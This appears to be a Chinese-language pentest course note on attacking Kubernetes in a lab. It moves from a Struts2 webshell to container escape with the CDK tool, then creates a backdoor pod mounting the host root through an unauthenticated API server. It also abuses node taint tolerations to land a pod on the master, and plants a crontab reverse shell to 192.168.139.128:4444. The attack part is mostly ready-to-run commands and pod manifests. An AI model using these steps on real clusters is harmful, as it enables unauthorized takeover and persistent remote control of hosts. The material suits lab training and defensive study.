目录
知识点:
1、云原生-K8s安全-横向移动-污点Taint2、云原生-K8s安全-Kubernetes实战场景
云原生-K8s安全-横向移动-污点Taint
如何判断实战中能否利用污点Taint?
设置污点
kubectl taint nodes node1 xtz=value1:NoSchedule
去除污点
kubectl taint nodes node1 xtz:NoSchedule-
节点说明中,查找 Taints 字段
拿到node节点权限时可以查看其他node主机或者master主机是否支持用Taint污点横向移动
kubectl describe nodes node-name
data:image/s3,"s3://crabby-images/5a1b8/5a1b8934bfbdfa66f584237b165f0e744c64ea55" alt=""
data:image/s3,"s3://crabby-images/f3a6d/f3a6d34d010a15f5e526da1d7ebbc1e2c347051f" alt=""
data:image/s3,"s3://crabby-images/6dbc1/6dbc1ca0d53e5426eda02db2b68e4d8b395623a1" alt=""
data:image/s3,"s3://crabby-images/dcadf/dcadf1a28e7d9719f3575f5e27d53c517c0aa246" alt=""
云原生-K8s安全-Kubernetes实战场景
data:image/s3,"s3://crabby-images/04c65/04c657f1ec47b7b830589ff7d7f49196ccedcaa1" alt=""
1、攻击Pod部署Web应用
Web应用部署:(struts2漏洞)
拉取靶场镜像
kubectl create deployment xiaodi --image=vulhub/struts2:2.3.28
data:image/s3,"s3://crabby-images/e7633/e7633e2576c40632815ccb04c13b5d805536138e" alt=""
查看pod容器的状态(归属节点、内部IP、运行状态等)
kubectl get pods -o wide
data:image/s3,"s3://crabby-images/4be1c/4be1c03f5125194bfc1a3f0654cd48a351ec7680" alt=""
启动靶场镜像服务
kubectl expose deploy xiaodi --port=8080 --target-port=8080 --type=NodePort
data:image/s3,"s3://crabby-images/8b559/8b559264feb3ba45912d7b5948273016bdbaf271" alt=""
kubectl get pod,svc
data:image/s3,"s3://crabby-images/36a07/36a0760932128db62a116bdf35f54f98c325bfd7" alt=""
利用Web漏洞拿下权限
data:image/s3,"s3://crabby-images/9024c/9024c8cb83677151b15e6fb912e9fe84d8301a47" alt=""
data:image/s3,"s3://crabby-images/0032d/0032d119d9a195240e11311327e553ff9d801a0c" alt=""
data:image/s3,"s3://crabby-images/ce234/ce23478b09cd3c44f754e98cebf46572a7a2fb0a" alt=""
data:image/s3,"s3://crabby-images/50654/506541e7e19ecac1383d2cb74e7a14a91ed5f269" alt=""
探针当前Webshell环境是否是docker容器
两种情况:
- 纯在docker容器里
- 在k8s下的某个主机里的docker容器
data:image/s3,"s3://crabby-images/5115c/5115c53598e7024c6f6de3527e38bfea815f7dcb" alt=""
ls -al /
data:image/s3,"s3://crabby-images/48d3b/48d3bf488eced9ba7a384d431fc880188fb1a730" alt=""
但是这还没完,因为这个docker容器有很大可能会在k8s下面
cat /proc/1/cgroup
data:image/s3,"s3://crabby-images/c2c27/c2c274ff44adda57dbb21333fc3afa6da9caa768" alt=""
docker逃逸
data:image/s3,"s3://crabby-images/2fa63/2fa633e60d30bd69ec6857fb42b39b4a246b5e26" alt=""
工具地址:https://github.com/cdk-team/CDK
data:image/s3,"s3://crabby-images/929f8/929f80fea29791fd565b2df9b9e7194b6f9a3e55" alt=""
data:image/s3,"s3://crabby-images/f487d/f487d35ab7ef6c9dbdd1cbc4792368ba750ec5dc" alt=""
data:image/s3,"s3://crabby-images/cec9d/cec9db54855d929b0cdc3fa4ec6cfa15fdec7dbd" alt=""
data:image/s3,"s3://crabby-images/60aef/60aef56fb1bce7cd7311ff77eedb3ee7e60ac3ee" alt=""
data:image/s3,"s3://crabby-images/8f4bd/8f4bd463704727915384db22addc1458c533b3bd" alt=""
data:image/s3,"s3://crabby-images/56b28/56b28dfa489e2efd4b9960c566b8e2a13ea517f1" alt=""
data:image/s3,"s3://crabby-images/468c3/468c39eace32c7392b061c108d9a4dc1477decde" alt=""
/tmp > chmod +x cdl
/tmp > ./cdk evalute
data:image/s3,"s3://crabby-images/0562f/0562f2ec91973aa6b039c24e2aae9c610d66801c" alt=""
data:image/s3,"s3://crabby-images/6818c/6818cf6b8a630f0f70b3649789197c0b47bc21d0" alt=""
data:image/s3,"s3://crabby-images/c3630/c3630e9c570161701408fd6a2c8ea7c0b6d00cf4" alt=""
2、利用k8s-Api-Server未授权提交创建后门Pod
data:image/s3,"s3://crabby-images/b3cc4/b3cc4859cc72df30fe3ba5a206b02e4ac940825a" alt=""
data:image/s3,"s3://crabby-images/77d95/77d9540357e2398626aebcefa9f102d95d5bb660" alt=""
./cdk_linux_amd64 kcurl anonymous post 'https://10.96.0.1:443/api/v1/namespaces/default/pods/' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'
data:image/s3,"s3://crabby-images/10cf2/10cf275baafabc800b07208cc8e390a290763e5e" alt=""
或者
./kubectl -s 10.96.0.1:443 create -f test.yaml
//test.yam就是{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}的值
查看后门pod是否创建
curl -k https://10.96.0.1:443/api/v1/namespaces/default/pods
data:image/s3,"s3://crabby-images/10642/10642b0ad0d8d4afd91fa7fb52a5297f47276e64" alt=""
3、实现挂载目录宿主机逃逸
data:image/s3,"s3://crabby-images/cbf2d/cbf2d03b8639c84930d9418f042ae8b48849bc85" alt=""
data:image/s3,"s3://crabby-images/c3db9/c3db96a2366961093c65283bda7f2db204fa181d" alt=""
data:image/s3,"s3://crabby-images/30b13/30b1303ba2efd8c31b737efcc2d379e06566e0f3" alt=""
data:image/s3,"s3://crabby-images/324d7/324d7cc8e04d2a8fb6791397d64df9017f2251bb" alt=""
data:image/s3,"s3://crabby-images/a0c7d/a0c7d611871a1ab4df2e97467a5af15439c8c925" alt=""
加参数绕过交互式
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods
data:image/s3,"s3://crabby-images/48440/48440877a6ae7443f9cb82a9120fada0ee4d2127" alt=""
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec test02 -- bash -c "ls /host"
//host目录就是挂载目录,相当于宿主机的/目录,可以自定义的。
data:image/s3,"s3://crabby-images/186e4/186e47a54525c2e219209821166d90aa66609f51" alt=""
4、利用污点Taint横向移动
参考:https://cn-sec.com/archives/1336486.html
获取node节点详情
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes | grep Taints
data:image/s3,"s3://crabby-images/e3512/e351286888c599e12af9cf42b03233b178147e2a" alt=""
或者
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes
data:image/s3,"s3://crabby-images/66569/665693a3ff3e08a124d6b83814c5ec8129ba604d" alt=""
cat > x.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
name: control-master-xiaodi //自定义
spec:
tolerations:
- key: node-role.kubernetes.io/master //这里要修改
operator: Exists
effect: NoSchedule
containers:
- name: control-master-xiaodi //自定义
image: ubuntu:18.04
command: ["/bin/sleep", "3650d"]
volumeMounts:
- name: master
mountPath: /master //自定义
volumes:
- name: master
hostPath:
path: /
type: Directory
EOF
data:image/s3,"s3://crabby-images/3194e/3194e85e715ebbd998a676f62b1a31e58dc80f34" alt=""
创建一个新pod容器
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a create -f ./x.yaml
data:image/s3,"s3://crabby-images/fcb90/fcb90cc1df9f448aaeca36d6fe33656a238abc5c" alt=""
查看新建pod容器归属
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods -o wide
利用新建pod容器进行逃逸
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec control-master -- bash -c "ls /master"
data:image/s3,"s3://crabby-images/c3bc0/c3bc0fda77950be88ff1dabadf45cd3e553231d8" alt=""
反弹master控制端的shell
echo -e '* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n' >> /master/etc/crontab
//这里的master路径要注意与上面一致
data:image/s3,"s3://crabby-images/319d7/319d79b67c02f432c7c8054c92ea66ac660a8fae" alt=""
data:image/s3,"s3://crabby-images/c9501/c9501e83384c80d4cffa60555b28f589f8aba2de" alt=""
data:image/s3,"s3://crabby-images/230af/230afd22824558f43bca302617bf0c4b1cbe02ce" alt=""
5、利用Config泄漏横向移动
也可以利用节点泄漏的config横向移动节点
data:image/s3,"s3://crabby-images/ecb26/ecb263bd46a47c9b19a0e9ab34d87c29c5b318b3" alt=""
data:image/s3,"s3://crabby-images/9ad43/9ad43c149426db56eed5b5a6e41d73010e0c695a" alt=""
./kubectl -s https://10.96.0.1:443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes
./kubectl apply -f test.yaml -n default --kubeconfig=config
./kubectl -n default --kubeconfig=config exec xiaodisec -- bash -c "ls /mnt/root"